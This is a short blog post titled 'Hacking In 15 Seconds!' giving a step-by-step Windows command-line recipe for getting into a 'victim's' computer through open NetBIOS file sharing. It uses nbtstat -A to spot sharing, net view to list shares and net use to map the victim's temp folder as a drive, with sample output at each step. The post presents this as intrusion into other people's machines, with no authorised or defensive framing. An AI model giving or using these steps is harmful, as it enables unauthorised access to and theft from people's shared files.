Hacking In 15 Seconds!

Hacking In 15 Seconds!

If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt


Code:



Nbtstat -A 




[e.g: nbtstat -A 207.175.1.1]



This will give you a read out that looks like this


Code:
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________


The numbers in the <> are hex code values. What we are

interested in is the “Hex Code- number of <20>.

A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -


Code:
Net view \\


[e.g : net view \\207.175.1.1]



You will then get a response that looks something like this.

Code:

Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________

(The command was completed successfully.)




Code:
Net use x: \\\temp


[e.g : net use x: \\207.175.1.1\temp]



If all goes well for you, you will then get a response of


Code:
(The command was completed successfully.)

Open my computer you will see your victim's temp folder there
Leave a Comment

0 comments:

Post a Comment